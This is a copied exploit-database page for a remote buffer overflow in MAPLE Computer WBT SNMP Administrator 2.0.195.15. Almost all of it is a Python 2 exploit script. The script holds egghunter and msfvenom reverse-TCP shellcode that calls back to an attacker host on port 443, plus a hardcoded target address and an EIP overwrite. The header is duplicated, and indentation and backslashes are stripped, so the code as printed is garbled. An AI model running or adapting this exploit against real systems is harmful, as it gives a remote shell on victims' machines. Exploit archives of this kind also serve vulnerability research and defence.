MAPLE Computer WBT SNMP Administrator 2.0.195.15 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 385
# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab # Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)


#!/usr/bin/python

import sys
import socket
import random
import string
import struct



def pattern_create(_type,_length):
_type = _type.split(" ")

if _type[0] == "trash":
return _type[1] * _length
elif _type[0] == "random":
return ''.join(random.choice(string.lowercase) for i in range(_length))
elif _type[0] == "pattern":
_pattern = ''
_parts = ['A', 'a', '0']
while len(_pattern) != _length:
_pattern += _parts[len(_pattern) % 3]
if len(_pattern) % 3 == 0:
_parts[2] = chr(ord(_parts[2]) + 1)
if _parts[2] > '9':
_parts[2] = '0'
_parts[1] = chr(ord(_parts[1]) + 1)
if _parts[1] > 'z':
_parts[1] = 'a'
_parts[0] = chr(ord(_parts[0]) + 1)
if _parts[0] > 'Z':
_parts[0] = 'A'
return _pattern
else:
return "Not Found"

def pwned(_host, _port, _payload):
print "[*] Conectandose a {0}:{1}...".format(_host, _port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((_host, _port))
print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
_payload = "{0} ".format(_payload)
s.send(_payload)
_data = s.recv(1024)
s.shutdown
s.close
print 'Recibido:', repr(_data)
print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():

_host = "192.168.0.12"
_port = 987
_offset_eip = 642200
_padding = 642144
_eip = "xc3x78xd7x5a" #call ebx 0x5AD778C3
_tag = "w00tw00t"

#msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
_shellcode = ("x89xe6xdaxd8xd9x76xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x39x6cx39x78x6cx42x53x30x73x30x35x50x35x30x4d"
"x59x78x65x30x31x4bx70x51x74x6ex6bx36x30x54x70"
"x4ex6bx33x62x74x4cx4ex6bx30x52x52x34x4cx4bx44"
"x32x45x78x46x6fx6cx77x33x7ax31x36x64x71x6bx4f"
"x6ex4cx65x6cx30x61x73x4cx74x42x46x4cx67x50x59"
"x51x68x4fx36x6dx76x61x7ax67x59x72x4cx32x51x42"
"x32x77x4ex6bx33x62x36x70x6ex6bx52x6ax47x4cx4e"
"x6bx42x6cx76x71x61x68x5ax43x52x68x33x31x58x51"
"x63x61x6cx4bx52x79x45x70x57x71x79x43x4cx4bx53"
"x79x62x38x4bx53x44x7ax37x39x4cx4bx66x54x4cx4b"
"x47x71x38x56x76x51x49x6fx6ex4cx7ax61x78x4fx34"
"x4dx76x61x5ax67x56x58x79x70x33x45x49x66x66x63"
"x51x6dx69x68x65x6bx73x4dx66x44x64x35x5ax44x50"
"x58x4ex6bx30x58x37x54x47x71x59x43x63x56x6ex6b"
"x44x4cx50x4bx4cx4bx46x38x75x4cx43x31x69x43x4e"
"x6bx44x44x6cx4bx45x51x38x50x4dx59x57x34x36x44"
"x51x34x51x4bx53x6bx33x51x71x49x53x6ax76x31x6b"
"x4fx69x70x61x4fx63x6fx53x6ax6ex6bx62x32x58x6b"
"x6ex6dx61x4dx75x38x55x63x37x42x53x30x77x70x52"
"x48x54x37x74x33x57x42x71x4fx32x74x50x68x62x6c"
"x51x67x36x46x56x67x6ex69x59x78x6bx4fx4ex30x6e"
"x58x4ex70x73x31x55x50x53x30x56x49x48x44x53x64"
"x66x30x45x38x76x49x6fx70x32x4bx33x30x79x6fx4e"
"x35x43x5ax57x7ax31x78x6bx70x4fx58x75x50x76x6b"
"x33x58x75x52x65x50x43x31x6dx6bx6cx49x48x66x72"
"x70x76x30x76x30x66x30x43x70x46x30x61x50x72x70"
"x32x48x6bx5ax56x6fx69x4fx4bx50x69x6fx48x55x7a"
"x37x43x5ax56x70x31x46x36x37x43x58x6ex79x6ex45"
"x42x54x51x71x4bx4fx39x45x4ex65x4bx70x43x44x46"
"x6ax39x6fx70x4ex45x58x50x75x38x6cx49x78x33x57"
"x35x50x35x50x73x30x32x4ax45x50x71x7ax64x44x31"
"x46x50x57x42x48x64x42x78x59x4ax68x73x6fx49x6f"
"x49x45x4dx53x48x78x73x30x71x6ex77x46x6ex6bx75"
"x66x73x5ax57x30x73x58x67x70x34x50x47x70x47x70"
"x46x36x70x6ax37x70x50x68x51x48x69x34x76x33x78"
"x65x39x6fx79x45x5ax33x76x33x51x7ax55x50x66x36"
"x71x43x52x77x31x78x56x62x78x59x6fx38x53x6fx49"
"x6fx79x45x4ex63x58x78x45x50x71x6dx64x68x70x58"
"x61x78x33x30x51x50x43x30x47x70x53x5ax53x30x70"
"x50x51x78x64x4bx36x4fx44x4fx50x30x69x6fx58x55"
"x31x47x31x78x54x35x52x4ex62x6dx35x31x49x6fx7a"
"x75x31x4ex51x4ex4bx4fx64x4cx46x44x76x6fx6ex65"
"x54x30x59x6fx79x6fx4bx4fx6bx59x4fx6bx69x6fx79"
"x6fx39x6fx37x71x48x43x51x39x4fx36x74x35x6fx31"
"x58x43x4fx4bx78x70x58x35x6ex42x43x66x70x6ax37"
"x70x73x63x69x6fx59x45x41x41")

_egghunter = ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7")

_inject = pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
_inject += _tag
_inject += _shellcode
_inject += _egghunter
_inject += pattern_create("trash B", _offset_eip-len(_inject))
_inject += _eip

print(_inject)
pwned(_host,_port,_inject)

if __name__ == "__main__":
main()